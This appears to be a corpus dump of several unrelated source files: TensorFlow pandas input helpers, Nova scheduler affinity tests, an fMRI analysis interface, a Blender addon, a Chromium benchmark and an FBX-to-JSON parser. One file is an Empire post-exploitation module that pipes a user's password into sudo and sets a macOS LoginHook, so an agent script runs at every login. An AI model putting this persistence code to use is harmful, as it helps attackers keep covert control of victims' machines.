# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Methods to allow pandas.DataFrame."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.learn.python.learn.dataframe.queues import feeding_functions
try:
# pylint: disable=g-import-not-at-top
import pandas as pd
HAS_PANDAS = True
except IOError:
# Pandas writes a temporary file during import. If it fails, don't use pandas.
HAS_PANDAS = False
except ImportError:
HAS_PANDAS = False
PANDAS_DTYPES = {
'int8': 'int',
'int16': 'int',
'int32': 'int',
'int64': 'int',
'uint8': 'int',
'uint16': 'int',
'uint32': 'int',
'uint64': 'int',
'float16': 'float',
'float32': 'float',
'float64': 'float',
'bool': 'i'
}
def extract_pandas_data(data):
"""Extract data from pandas.DataFrame for predictors.
Given a DataFrame, will extract the values and cast them to float. The
DataFrame is expected to contain values of type int, float or bool.
Args:
data: `pandas.DataFrame` containing the data to be extracted.
Returns:
A numpy `ndarray` of the DataFrame's values as floats.
Raises:
ValueError: if data contains types other than int, float or bool.
"""
if not isinstance(data, pd.DataFrame):
return data
bad_data = [column for column in data
if data[column].dtype.name not in PANDAS_DTYPES]
if not bad_data:
return data.values.astype('float')
else:
error_report = [("'" + str(column) + "' type='" +
data[column].dtype.name + "'") for column in bad_data]
raise ValueError('Data types for extracting pandas data must be int, '
'float, or bool. Found: ' + ', '.join(error_report))
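# Illustrative example (assumed input, not from the original source):
#   extract_pandas_data(pd.DataFrame({'a': [1, 2], 'b': [True, False]}))
# would return the float ndarray [[1., 1.], [2., 0.]], while a DataFrame
# containing a string column would raise the ValueError above.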
def extract_pandas_matrix(data):
"""Extracts numpy matrix from pandas DataFrame.
Args:
data: `pandas.DataFrame` containing the data to be extracted.
Returns:
A numpy `ndarray` of the DataFrame's values.
"""
if not isinstance(data, pd.DataFrame):
return data
return data.as_matrix()
def extract_pandas_labels(labels):
"""Extract data from pandas.DataFrame for labels.
Args:
labels: `pandas.DataFrame` or `pandas.Series` containing one column of
labels to be extracted.
Returns:
A numpy `ndarray` of labels from the DataFrame.
Raises:
ValueError: if more than one column is found or type is not int, float or
bool.
"""
if isinstance(labels,
pd.DataFrame): # pandas.Series also belongs to DataFrame
if len(labels.columns) > 1:
raise ValueError('Only one column for labels is allowed.')
bad_data = [column for column in labels
if labels[column].dtype.name not in PANDAS_DTYPES]
if not bad_data:
return labels.values
else:
error_report = ["'" + str(column) + "' type="
+ str(labels[column].dtype.name) for column in bad_data]
raise ValueError('Data types for extracting labels must be int, '
'float, or bool. Found: ' + ', '.join(error_report))
else:
return labels
def pandas_input_fn(x,
y=None,
batch_size=128,
num_epochs=1,
shuffle=True,
queue_capacity=1000,
num_threads=1,
target_column='target'):
"""Returns input function that would feed Pandas DataFrame into the model.
Note: `y`'s index must match `x`'s index.
Args:
x: pandas `DataFrame` object.
y: pandas `Series` object.
batch_size: int, size of batches to return.
num_epochs: int, number of epochs to iterate over data. If not `None`,
read attempts that would exceed this value will raise `OutOfRangeError`.
shuffle: bool, whether to read the records in random order.
queue_capacity: int, size of the read queue. If `None`, it will be set
roughly to the size of `x`.
num_threads: int, number of threads used for reading and enqueueing.
target_column: str, name to give the target column `y`.
Returns:
Function, that has signature of ()->(dict of `features`, `target`)
Raises:
ValueError: if `x` already contains a column with the same name as `y`, or
if the indexes of `x` and `y` don't match.
"""
x = x.copy()
if y is not None:
if target_column in x:
raise ValueError(
'Cannot use name %s for target column: DataFrame already has a '
'column with that name: %s' % (target_column, x.columns))
if not np.array_equal(x.index, y.index):
raise ValueError('Index for x and y are mismatched.\nIndex for x: %s\n'
'Index for y: %s\n' % (x.index, y.index))
x[target_column] = y
# TODO(mdan): These are memory copies. We probably don't need 4x slack space.
# The sizes below are consistent with what I've seen elsewhere.
if queue_capacity is None:
if shuffle:
queue_capacity = 4 * len(x)
else:
queue_capacity = len(x)
min_after_dequeue = max(queue_capacity / 4, 1)
def input_fn():
"""Pandas input function."""
queue = feeding_functions.enqueue_data(
x,
queue_capacity,
shuffle=shuffle,
min_after_dequeue=min_after_dequeue,
num_threads=num_threads,
enqueue_size=batch_size,
num_epochs=num_epochs)
if num_epochs is None:
features = queue.dequeue_many(batch_size)
else:
features = queue.dequeue_up_to(batch_size)
assert len(features) == len(x.columns) + 1, ('Features should have one '
'extra element for the index.')
features = features[1:]
features = dict(zip(list(x.columns), features))
if y is not None:
target = features.pop(target_column)
return features, target
return features
return input_fn
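# Minimal usage sketch (assumed data, not from the original source):
#   x = pd.DataFrame({'age': [25, 32], 'income': [50.0, 60.0]})
#   y = pd.Series([0, 1])
#   input_fn = pandas_input_fn(x, y, batch_size=2, shuffle=False)
#   features, target = input_fn()  # dict of feature tensors and a target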
| apache-2.0 | -4,111,842,622,375,606,300 | 31.646766 | 84 | 0.631667 | false |
mikalstill/nova | nova/tests/unit/scheduler/filters/test_affinity_filters.py | 6 | 10892 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_utils.fixture import uuidsentinel as uuids
from nova import objects
from nova.scheduler.filters import affinity_filter
from nova import test
from nova.tests.unit.scheduler import fakes
class TestDifferentHostFilter(test.NoDBTestCase):
def setUp(self):
super(TestDifferentHostFilter, self).setUp()
self.filt_cls = affinity_filter.DifferentHostFilter()
def test_affinity_different_filter_passes(self):
host = fakes.FakeHostState('host1', 'node1', {})
inst1 = objects.Instance(uuid=uuids.instance)
host.instances = {inst1.uuid: inst1}
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=dict(different_host=['same']))
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_affinity_different_filter_fails(self):
inst1 = objects.Instance(uuid=uuids.instance)
host = fakes.FakeHostState('host1', 'node1', {})
host.instances = {inst1.uuid: inst1}
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=dict(different_host=[uuids.instance]))
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_affinity_different_filter_handles_none(self):
inst1 = objects.Instance(uuid=uuids.instance)
host = fakes.FakeHostState('host1', 'node1', {})
host.instances = {inst1.uuid: inst1}
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=None)
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
class TestSameHostFilter(test.NoDBTestCase):
def setUp(self):
super(TestSameHostFilter, self).setUp()
self.filt_cls = affinity_filter.SameHostFilter()
def test_affinity_same_filter_passes(self):
inst1 = objects.Instance(uuid=uuids.instance)
host = fakes.FakeHostState('host1', 'node1', {})
host.instances = {inst1.uuid: inst1}
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=dict(same_host=[uuids.instance]))
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_affinity_same_filter_no_list_passes(self):
host = fakes.FakeHostState('host1', 'node1', {})
host.instances = {}
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=dict(same_host=['same']))
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_affinity_same_filter_fails(self):
inst1 = objects.Instance(uuid=uuids.instance)
host = fakes.FakeHostState('host1', 'node1', {})
host.instances = {inst1.uuid: inst1}
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=dict(same_host=['same']))
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_affinity_same_filter_handles_none(self):
inst1 = objects.Instance(uuid=uuids.instance)
host = fakes.FakeHostState('host1', 'node1', {})
host.instances = {inst1.uuid: inst1}
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=None)
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
class TestSimpleCIDRAffinityFilter(test.NoDBTestCase):
def setUp(self):
super(TestSimpleCIDRAffinityFilter, self).setUp()
self.filt_cls = affinity_filter.SimpleCIDRAffinityFilter()
def test_affinity_simple_cidr_filter_passes(self):
host = fakes.FakeHostState('host1', 'node1', {})
host.host_ip = '10.8.1.1'
affinity_ip = "10.8.1.100"
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=dict(
cidr=['/24'],
build_near_host_ip=[affinity_ip]))
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_affinity_simple_cidr_filter_fails(self):
host = fakes.FakeHostState('host1', 'node1', {})
host.host_ip = '10.8.1.1'
affinity_ip = "10.8.1.100"
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=dict(
cidr=['/32'],
build_near_host_ip=[affinity_ip]))
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_affinity_simple_cidr_filter_handles_none(self):
host = fakes.FakeHostState('host1', 'node1', {})
spec_obj = objects.RequestSpec(
context=mock.sentinel.ctx,
scheduler_hints=None)
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
class TestGroupAffinityFilter(test.NoDBTestCase):
def _test_group_anti_affinity_filter_passes(self, filt_cls, policy):
host = fakes.FakeHostState('host1', 'node1', {})
spec_obj = objects.RequestSpec(instance_group=None)
self.assertTrue(filt_cls.host_passes(host, spec_obj))
spec_obj = objects.RequestSpec(instance_group=objects.InstanceGroup(
policy='affinity'))
self.assertTrue(filt_cls.host_passes(host, spec_obj))
spec_obj = objects.RequestSpec(instance_group=objects.InstanceGroup(
policy=policy, members=[]), instance_uuid=uuids.fake)
spec_obj.instance_group.hosts = []
self.assertTrue(filt_cls.host_passes(host, spec_obj))
spec_obj.instance_group.hosts = ['host2']
self.assertTrue(filt_cls.host_passes(host, spec_obj))
def test_group_anti_affinity_filter_passes(self):
self._test_group_anti_affinity_filter_passes(
affinity_filter.ServerGroupAntiAffinityFilter(),
'anti-affinity')
def _test_group_anti_affinity_filter_fails(self, filt_cls, policy):
inst1 = objects.Instance(uuid=uuids.inst1)
# We already have an inst1 on host1
host = fakes.FakeHostState('host1', 'node1', {}, instances=[inst1])
spec_obj = objects.RequestSpec(
instance_group=objects.InstanceGroup(policy=policy,
hosts=['host1'],
members=[uuids.inst1],
rules={}),
instance_uuid=uuids.fake)
self.assertFalse(filt_cls.host_passes(host, spec_obj))
def test_group_anti_affinity_filter_fails(self):
self._test_group_anti_affinity_filter_fails(
affinity_filter.ServerGroupAntiAffinityFilter(),
'anti-affinity')
def _test_group_anti_affinity_filter_with_rules(self, rules, members):
filt_cls = affinity_filter.ServerGroupAntiAffinityFilter()
inst1 = objects.Instance(uuid=uuids.inst1)
inst2 = objects.Instance(uuid=uuids.inst2)
spec_obj = objects.RequestSpec(
instance_group=objects.InstanceGroup(policy='anti-affinity',
hosts=['host1'],
members=members,
rules=rules),
instance_uuid=uuids.fake)
# 2 instances on same host
host_wit_2_inst = fakes.FakeHostState(
'host1', 'node1', {}, instances=[inst1, inst2])
return filt_cls.host_passes(host_wit_2_inst, spec_obj)
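    # Illustrative reading (not from the original source): with the
    # anti-affinity rule {"max_server_per_host": N}, a host that already runs
    # len(members) instances of the group accepts another one only while that
    # count is below N, which the fail/pass tests below exercise.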
def test_group_anti_affinity_filter_with_rules_fail(self):
        # the members of this group on the host have already reached the max,
        # so creating one more server would fail.
result = self._test_group_anti_affinity_filter_with_rules(
{"max_server_per_host": 1}, [uuids.inst1])
self.assertFalse(result)
result = self._test_group_anti_affinity_filter_with_rules(
{"max_server_per_host": 2}, [uuids.inst1, uuids.inst2])
self.assertFalse(result)
def test_group_anti_affinity_filter_with_rules_pass(self):
result = self._test_group_anti_affinity_filter_with_rules(
{"max_server_per_host": 1}, [])
self.assertTrue(result)
# we can have at most 2 members from the same group on the same host.
result = self._test_group_anti_affinity_filter_with_rules(
{"max_server_per_host": 2}, [uuids.inst1])
self.assertTrue(result)
def test_group_anti_affinity_filter_allows_instance_to_same_host(self):
fake_uuid = uuids.fake
mock_instance = objects.Instance(uuid=fake_uuid)
host_state = fakes.FakeHostState('host1', 'node1',
{}, instances=[mock_instance])
spec_obj = objects.RequestSpec(instance_group=objects.InstanceGroup(
policy='anti-affinity', hosts=['host1', 'host2'], members=[]),
instance_uuid=mock_instance.uuid)
self.assertTrue(affinity_filter.ServerGroupAntiAffinityFilter().
host_passes(host_state, spec_obj))
def _test_group_affinity_filter_passes(self, filt_cls, policy):
host = fakes.FakeHostState('host1', 'node1', {})
spec_obj = objects.RequestSpec(instance_group=None)
self.assertTrue(filt_cls.host_passes(host, spec_obj))
spec_obj = objects.RequestSpec(instance_group=objects.InstanceGroup(
policies=['anti-affinity']))
self.assertTrue(filt_cls.host_passes(host, spec_obj))
spec_obj = objects.RequestSpec(instance_group=objects.InstanceGroup(
policies=['affinity'],
hosts=['host1']))
self.assertTrue(filt_cls.host_passes(host, spec_obj))
def test_group_affinity_filter_passes(self):
self._test_group_affinity_filter_passes(
affinity_filter.ServerGroupAffinityFilter(), 'affinity')
def _test_group_affinity_filter_fails(self, filt_cls, policy):
host = fakes.FakeHostState('host1', 'node1', {})
spec_obj = objects.RequestSpec(instance_group=objects.InstanceGroup(
policies=[policy],
hosts=['host2']))
self.assertFalse(filt_cls.host_passes(host, spec_obj))
def test_group_affinity_filter_fails(self):
self._test_group_affinity_filter_fails(
affinity_filter.ServerGroupAffinityFilter(), 'affinity')
| apache-2.0 | 2,362,458,746,925,816,300 | 42.394422 | 78 | 0.628994 | false |
wanderine/BROCCOLI | code/Python_Wrapper/nipype/interfaces/broccoli/firstlevel.py | 2 | 5550 | from nipype.interfaces.base import TraitedSpec, BaseInterface, BaseInterfaceInputSpec, File, Directory, isdefined, traits
from nipype.utils.filemanip import split_filename
import scipy.io
import scipy.signal
import os
import os.path as op
import nibabel as nb
import numpy as np
import broccoli
from base import BroccoliInputSpec, BroccoliInterface
class FirstLevelAnalysisInputSpec(BroccoliInputSpec):
fMRI_file = File(exists=True, mandatory=True)
MNI_file = File(exists=True, mandatory=True)
MNI_brain_file = File(exists=True)
MNI_brain_mask_file = File(exists=True)
T1_file = File(exists=True, mandatory=True)
GLM_path = Directory(exists=True, mandatory=True)
filters_parametric = File(exists=True, mandatory=True,
desc='Matlab file with filters for parametric registration')
filters_nonparametric = File(exists=True, mandatory=True,
desc='Matlab file with filters for nonparametric registration')
iterations_parametric = traits.Int(15, usedefault=True)
iterations_nonparametric = traits.Int(10, usedefault=True)
iterations_motion_correction = traits.Int(3, usedefault=True)
beta_space = traits.Enum('EPI', 'MNI', desc='either EPI or MNI', usedefault=True)
regress_motion = traits.Bool(usedefault=True)
regress_confounds = traits.Bool(usedefault=True)
use_temporal_derivatives = traits.Bool(usedefault=True)
EPI_smoothing = traits.Float(5.5, usedefault=True)
AR_smoothing = traits.Float(7.0, usedefault=True)
class FirstLevelAnalysisOutputSpec(TraitedSpec):
statistical_map = File()
class FirstLevelAnalysis(BroccoliInterface):
input_spec = FirstLevelAnalysisInputSpec
output_spec = FirstLevelAnalysisOutputSpec
def load_regressor(self, filename, st, samples):
d = np.loadtxt(filename)
hr = np.zeros(samples * st)
tr = 2
for row in d:
start = int(round(row[0] * samples / tr))
duration = int(round(row[1] * samples / tr))
for i in range(duration):
hr[start + i] = row[2]
print(hr.shape)
print(np.count_nonzero(hr))
print(hr)
lr = scipy.signal.decimate(hr, samples)
return lr
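    # Illustrative sketch (assumed file contents, not from the original
    # source): each row of the regressor file is [onset_s, duration_s,
    # amplitude], e.g. "10 30 1" marks a 30 s block starting at 10 s; it is
    # upsampled to `samples` points per TR (TR = 2 s here) and then decimated
    # back to one value per volume.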
def load_regressors(self, st):
files = [f for f in os.listdir(self.inputs.GLM_path) if op.isfile(op.join(self.inputs.GLM_path, f))]
data = [self.load_regressor(op.join(self.inputs.GLM_path, f), st, 10) for f in files]
return np.array(data).transpose()
def _run_interface(self, runtime):
MNI, MNI_brain, MNI_brain_mask, MNI_voxel_sizes = broccoli.load_MNI_templates(self.inputs.MNI_file, self.inputs.MNI_brain_file, self.inputs.MNI_brain_mask_file)
fMRI, fMRI_voxel_sizes = broccoli.load_EPI(self.inputs.fMRI_file, only_volume=False)
T1, T1_voxel_sizes = broccoli.load_T1(self.inputs.T1_file)
filters_parametric_mat = scipy.io.loadmat(self.inputs.filters_parametric)
filters_nonparametric_mat = scipy.io.loadmat(self.inputs.filters_nonparametric)
filters_parametric = [filters_parametric_mat['f%d_parametric_registration' % (i+1)] for i in range(3)]
filters_nonparametric = [filters_nonparametric_mat['f%d_nonparametric_registration' % (i+1)] for i in range(6)]
projection_tensor = [filters_nonparametric_mat['m%d' % (i+1)][0] for i in range(6)]
filter_directions = [filters_nonparametric_mat['filter_directions_%s' % d][0] for d in ['x', 'y', 'z']]
X_GLM = self.load_regressors(fMRI.shape[3])
xtx = np.linalg.inv(np.dot(X_GLM.T, X_GLM))
# print(xtx)
xtxxt_GLM = xtx.dot(X_GLM.T)
confounds = 1
if self.inputs.regress_confounds:
confounds = np.loadtxt(self.inputs.confounds_file)
contrasts = np.array([[1, 0], [1, 0], [1, 0], [1, 0]])
ctxtxc_GLM = [contrasts[i:i+1].dot(xtx).dot(contrasts[i:i+1].T) for i in range(len(contrasts))]
        fMRI_voxel_sizes = [int(round(v)) for v in fMRI_voxel_sizes]
        T1_voxel_sizes = [int(round(v)) for v in T1_voxel_sizes]
        MNI_voxel_sizes = [int(round(v)) for v in MNI_voxel_sizes]
statistical_maps = broccoli.performFirstLevelAnalysis(
fMRI, fMRI_voxel_sizes, T1, T1_voxel_sizes, MNI, MNI_brain, MNI_brain_mask, MNI_voxel_sizes,
filters_parametric, filters_nonparametric, projection_tensor, filter_directions,
self.inputs.iterations_parametric, self.inputs.iterations_nonparametric, self.inputs.iterations_motion_correction, 4, 4, 0, 0,
self.inputs.regress_motion, self.inputs.EPI_smoothing, self.inputs.AR_smoothing, X_GLM, xtxxt_GLM.transpose(), contrasts, ctxtxc_GLM,
self.inputs.use_temporal_derivatives, getattr(broccoli, self.inputs.beta_space), confounds, self.inputs.regress_confounds,
self.inputs.opencl_platform, self.inputs.opencl_device, self.inputs.show_results,
)
EPI_nni = nb.load(self.inputs.fMRI_file)
aligned_EPI_nni = nb.Nifti1Image(statistical_maps, None, EPI_nni.get_header())
nb.save(aligned_EPI_nni, self._get_output_filename('statistical_map.nii'))
return runtime
def _list_outputs(self):
outputs = self.output_spec().get()
for k in outputs.keys():
outputs[k] = self._get_output_filename(k + '.nii')
return outputs
| gpl-3.0 | 2,255,084,076,372,702,700 | 45.25 | 168 | 0.651171 | false |
H-uru/pyprp2 | addons/PyPRP2/object.py | 1 | 2319 | #
# Copyright (C) 2010 PyPRP2 Project Team
# See the file AUTHORS for more info about the team.
#
# PyPRP2 is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PyPRP2 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with PyPRP2. If not, see <http://www.gnu.org/licenses/>.
import bpy
from bpy.props import *
from PyHSPlasma import *
import modifiers
import physics
class PlasmaObjectSettings(bpy.types.PropertyGroup):
physics = PointerProperty(attr = 'physics', type = physics.PlasmaPhysicsSettings)
modifiers = CollectionProperty(attr = 'modifiers', type = modifiers.PlasmaModifierLink)
drawableoverride = BoolProperty(name="Drawable Override", default = False)
activemodifier = IntProperty(attr = 'activemodifier', default = 0)
isdrawable = BoolProperty(name="Is Drawable", default=True, description="Export drawable for this object")
isdynamic = BoolProperty(name="Dynamic", default=False)
noexport = BoolProperty(name="Disable Export", default=False, description="Do not export this object to an age or prp")
class plObject(bpy.types.Panel):
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "object"
bl_label = "Plasma Object"
def draw(self,context):
layout = self.layout
view = context.object
pl = view.plasma_settings
self.layout.prop(pl, "isdrawable")
self.layout.prop(pl, "isdynamic")
self.layout.prop(pl, "noexport")
def register():
bpy.utils.register_class(plObject)
modifiers.register()
physics.register()
bpy.utils.register_class(PlasmaObjectSettings)
def unregister():
bpy.utils.unregister_class(PlasmaObjectSettings)
physics.unregister()
modifiers.unregister()
bpy.utils.unregister_class(plObject)
| gpl-3.0 | -3,589,153,594,675,264,500 | 37.305085 | 123 | 0.695558 | false |
AOSPU/external_chromium_org | tools/perf/benchmarks/spaceport.py | 8 | 2444 | # Copyright 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs spaceport.io's PerfMarks benchmark."""
import logging
import os
from telemetry import test
from telemetry.core import util
from telemetry.page import page_measurement
from telemetry.page import page_set
class _SpaceportMeasurement(page_measurement.PageMeasurement):
def __init__(self):
super(_SpaceportMeasurement, self).__init__()
def CustomizeBrowserOptions(self, options):
options.AppendExtraBrowserArgs('--disable-gpu-vsync')
def MeasurePage(self, page, tab, results):
tab.WaitForJavaScriptExpression(
'!document.getElementById("start-performance-tests").disabled', 60)
tab.ExecuteJavaScript("""
window.__results = {};
window.console.log = function(str) {
if (!str) return;
var key_val = str.split(': ');
if (!key_val.length == 2) return;
__results[key_val[0]] = key_val[1];
};
document.getElementById('start-performance-tests').click();
""")
num_results = 0
num_tests_in_spaceport = 24
while num_results < num_tests_in_spaceport:
tab.WaitForJavaScriptExpression(
'Object.keys(window.__results).length > %d' % num_results, 180)
num_results = tab.EvaluateJavaScript(
'Object.keys(window.__results).length')
logging.info('Completed test %d of %d' %
(num_results, num_tests_in_spaceport))
result_dict = eval(tab.EvaluateJavaScript(
'JSON.stringify(window.__results)'))
for key in result_dict:
chart, trace = key.split('.', 1)
results.Add(trace, 'objects (bigger is better)', float(result_dict[key]),
chart_name=chart, data_type='unimportant')
results.Add('Score', 'objects (bigger is better)',
[float(x) for x in result_dict.values()])
# crbug.com/166703: This test frequently times out on Windows.
@test.Disabled('mac', 'win')
class Spaceport(test.Test):
"""spaceport.io's PerfMarks benchmark."""
test = _SpaceportMeasurement
def CreatePageSet(self, options):
spaceport_dir = os.path.join(util.GetChromiumSrcDir(), 'chrome', 'test',
'data', 'third_party', 'spaceport')
ps = page_set.PageSet(file_path=spaceport_dir)
ps.AddPageWithDefaultRunNavigate('file://index.html')
return ps
| bsd-3-clause | 7,945,202,486,372,402,000 | 34.42029 | 79 | 0.658756 | false |
byt3bl33d3r/Empire | lib/modules/python/persistence/osx/loginhook.py | 10 | 4626 | class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'LoginHook',
# list of one or more authors for the module
'Author': ['@Killswitch-GUI'],
# more verbose multi-line description of the module
'Description': ('Installs Empire agent via LoginHook.'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : None,
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': ["https://support.apple.com/de-at/HT2420"]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Password' : {
'Description' : 'User password for sudo.',
'Required' : True,
'Value' : ''
},
'LoginHookScript' : {
'Description' : 'Full path of the script to be executed/',
'Required' : True,
'Value' : '/Users/Username/Desktop/kill-me.sh'
},
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
loginhookScriptPath = self.options['LoginHookScript']['Value']
password = self.options['Password']['Value']
password = password.replace('$', '\$')
password = password.replace('$', '\$')
password = password.replace('!', '\!')
password = password.replace('!', '\!')
script = """
import subprocess
import sys
try:
process = subprocess.Popen('which sudo|wc -l', stdout=subprocess.PIPE, shell=True)
result = process.communicate()
result = result[0].strip()
if str(result) != "1":
print "[!] ERROR to create a LoginHook requires (sudo) privileges!"
sys.exit()
try:
print " [*] Setting script to proper linux permissions"
process = subprocess.Popen('chmod +x %s', stdout=subprocess.PIPE, shell=True)
process.communicate()
except Exception as e:
print "[!] Issues setting login hook (line 81): " + str(e)
print " [*] Creating proper LoginHook"
try:
process = subprocess.Popen('echo "%s" | sudo -S defaults write com.apple.loginwindow LoginHook %s', stdout=subprocess.PIPE, shell=True)
process.communicate()
except Exception as e:
print "[!] Issues setting login hook (line 81): " + str(e)
try:
process = subprocess.Popen('echo "%s" | sudo -S defaults read com.apple.loginwindow', stdout=subprocess.PIPE, shell=True)
print " [*] LoginHook Output: "
result = process.communicate()
result = result[0].strip()
print " [*] LoginHook set to:"
print str(result)
except Exception as e:
print "[!] Issue checking LoginHook settings (line 86): " + str(e)
except Exception as e:
print "[!] Issue with LoginHook script: " + str(e)
""" % (loginhookScriptPath, password, loginhookScriptPath, password)
return script
| bsd-3-clause | -6,961,776,777,605,648,000 | 36.918033 | 143 | 0.561608 | false |
PLyczkowski/Sticky-Keymap | 2.74/scripts/addons/io_scene_fbx/fbx2json.py | 3 | 9356 | #!/usr/bin/env python3
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
# Script copyright (C) 2006-2012, assimp team
# Script copyright (C) 2013 Blender Foundation
"""
Usage
=====
fbx2json [FILES]...
This script will write a JSON file for each FBX argument given.
Output
======
The JSON data is formatted into a list of nested lists of 4 items:
``[id, [data, ...], "data_types", [subtree, ...]]``
Where each list may be empty, and the items in
the subtree are formatted the same way.
data_types is a string, aligned with data that specifies a type
for each property.
The types are as follows:
* 'Y': - INT16
* 'C': - BOOL
* 'I': - INT32
* 'F': - FLOAT32
* 'D': - FLOAT64
* 'L': - INT64
* 'R': - BYTES
* 'S': - STRING
* 'f': - FLOAT32_ARRAY
* 'i': - INT32_ARRAY
* 'd': - FLOAT64_ARRAY
* 'l': - INT64_ARRAY
* 'b': - BOOL ARRAY
* 'c': - BYTE ARRAY
Note that key:value pairs aren't used since the ids are not
guaranteed to be unique.
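For example (illustrative only, not taken from any real file), a node with a
single 32-bit integer property and no child nodes would be written as:
``["GeometryVersion", [124], "I", []]``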
"""
# ----------------------------------------------------------------------------
# FBX Binary Parser
from struct import unpack
import array
import zlib
# at the end of each nested block, there is a NUL record to indicate
# that the sub-scope exists (i.e. to distinguish between P: and P : {})
# this NUL record is 13 bytes long.
_BLOCK_SENTINEL_LENGTH = 13
_BLOCK_SENTINEL_DATA = (b'\0' * _BLOCK_SENTINEL_LENGTH)
_IS_BIG_ENDIAN = (__import__("sys").byteorder != 'little')
_HEAD_MAGIC = b'Kaydara FBX Binary\x20\x20\x00\x1a\x00'
from collections import namedtuple
FBXElem = namedtuple("FBXElem", ("id", "props", "props_type", "elems"))
del namedtuple
def read_uint(read):
return unpack(b'<I', read(4))[0]
def read_ubyte(read):
return unpack(b'B', read(1))[0]
def read_string_ubyte(read):
size = read_ubyte(read)
data = read(size)
return data
def unpack_array(read, array_type, array_stride, array_byteswap):
length = read_uint(read)
encoding = read_uint(read)
comp_len = read_uint(read)
data = read(comp_len)
if encoding == 0:
pass
elif encoding == 1:
data = zlib.decompress(data)
assert(length * array_stride == len(data))
data_array = array.array(array_type, data)
if array_byteswap and _IS_BIG_ENDIAN:
data_array.byteswap()
return data_array
read_data_dict = {
b'Y'[0]: lambda read: unpack(b'<h', read(2))[0], # 16 bit int
b'C'[0]: lambda read: unpack(b'?', read(1))[0], # 1 bit bool (yes/no)
b'I'[0]: lambda read: unpack(b'<i', read(4))[0], # 32 bit int
b'F'[0]: lambda read: unpack(b'<f', read(4))[0], # 32 bit float
b'D'[0]: lambda read: unpack(b'<d', read(8))[0], # 64 bit float
b'L'[0]: lambda read: unpack(b'<q', read(8))[0], # 64 bit int
b'R'[0]: lambda read: read(read_uint(read)), # binary data
b'S'[0]: lambda read: read(read_uint(read)), # string data
b'f'[0]: lambda read: unpack_array(read, 'f', 4, False), # array (float)
b'i'[0]: lambda read: unpack_array(read, 'i', 4, True), # array (int)
b'd'[0]: lambda read: unpack_array(read, 'd', 8, False), # array (double)
b'l'[0]: lambda read: unpack_array(read, 'q', 8, True), # array (long)
b'b'[0]: lambda read: unpack_array(read, 'b', 1, False), # array (bool)
b'c'[0]: lambda read: unpack_array(read, 'B', 1, False), # array (ubyte)
}
def read_elem(read, tell, use_namedtuple):
# [0] the offset at which this block ends
# [1] the number of properties in the scope
# [2] the length of the property list
end_offset = read_uint(read)
if end_offset == 0:
return None
prop_count = read_uint(read)
prop_length = read_uint(read)
